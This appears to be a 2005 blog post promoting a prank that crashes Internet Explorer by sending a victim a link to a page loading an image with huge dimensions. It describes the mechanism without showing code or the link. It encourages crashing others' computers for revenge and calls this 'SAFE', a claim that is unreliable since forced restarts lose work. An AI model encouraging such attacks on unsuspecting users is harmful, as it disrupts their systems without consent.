Thursday, June 2, 2005

Evil Crashing PC Trick

Have a buddy or co-worker you are looking to "get back at", perhaps play a little prank on? Revenge can be sweet! Maybe you are just feeling a little mean/evil today and you want to let out a devilish chuckle as you watch another human in pain. If you answered yes to any of that, then stop rubbing your chin and smirking while plotting you plan because I've already done the dirty work for you. So grab your pitchfork and jump thru the hot coals with me - the fun is about to begin. Mmmwaaahaaahaaa!

This IE exploit will freeze Internet Explorer users (which is just about everyone) almost immediately after clicking it. It works by an HTML file trying to load an image with excessively large dimensions specified by the coding. Right as the image begins to load, IE just starts to lock up and the user may hear some beeping noises coming from the inside of the computer and possibly "The Blue Screen Of Death" (AKA, Windows blue error message screen). 97% of the time, this ultimately results in the user being forced to restart his or her computer. No long-term harm is done to any computer from this crash. It is just a simple overload which causes the computer to shut down. So in other words, it's SAFE but annoying - perfect! Below is the link you will need to send to your "victim". DO NOT click on it yourself, unless you want to experience the crash first hand. I should note to the gullible, melting will not occur from this trick.

Clicking on this link will crash your system. Use at your own risk.

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